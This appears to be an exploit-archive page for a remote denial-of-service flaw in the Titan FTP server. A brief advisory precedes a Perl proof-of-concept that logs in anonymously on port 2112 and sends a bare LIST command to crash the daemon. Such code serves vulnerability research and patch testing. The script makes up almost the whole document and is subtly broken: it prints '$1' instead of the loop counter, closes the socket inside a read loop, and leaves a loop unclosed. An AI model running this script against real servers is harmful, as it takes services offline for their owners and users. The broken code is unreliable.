81 lines
No EOL
1.2 KiB
Perl
Executable file
81 lines
No EOL
1.2 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/10272/info
|
|
|
|
Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.
|
|
|
|
A remote attacker can cause the FTP server to crash by improperly handling a non-existent socket.
|
|
|
|
#!/usr/bin/perl
|
|
# Test for Titan FTP server security vulnerability
|
|
|
|
use IO::Socket;
|
|
|
|
$host = "192.168.1.243";
|
|
|
|
my @combination;
|
|
$combination[0] = "LIST \r\n";
|
|
|
|
for (my $i = 0; $combination[$i] ; $i++)
|
|
{
|
|
print "Combination: $1\n";
|
|
|
|
$remote = IO::Socket::INET->new ( Proto => "tcp",
|
|
PeerAddr => $host,
|
|
PeerPort => "2112",
|
|
);
|
|
unless ($remote) { die "cannot connect to ftp daemon on $host" }
|
|
|
|
print "connected\n";
|
|
while (<$remote>)
|
|
{
|
|
print $_;
|
|
if (/220 /)
|
|
{
|
|
last;
|
|
}
|
|
}
|
|
|
|
$remote->autoflush(1);
|
|
|
|
my $ftp = "USER anonymous\r\n";
|
|
|
|
print $remote $ftp;
|
|
print $ftp;
|
|
|
|
while (<$remote>)
|
|
{
|
|
print $_;
|
|
if (/331 /)
|
|
{
|
|
last;
|
|
}
|
|
}
|
|
|
|
$ftp = "PASS a\@b.com\r\n";
|
|
print $remote $ftp;
|
|
print $ftp;
|
|
|
|
while (<$remote>)
|
|
{
|
|
print $_;
|
|
if (/230 /)
|
|
{
|
|
last;
|
|
}
|
|
}
|
|
|
|
$ftp = $combination[$i];
|
|
|
|
print $remote $ftp;
|
|
print $ftp;
|
|
|
|
while (<$remote>)
|
|
{
|
|
print $_;
|
|
if (/150 /)
|
|
{
|
|
last;
|
|
}
|
|
|
|
|
|
close $remote;
|
|
} |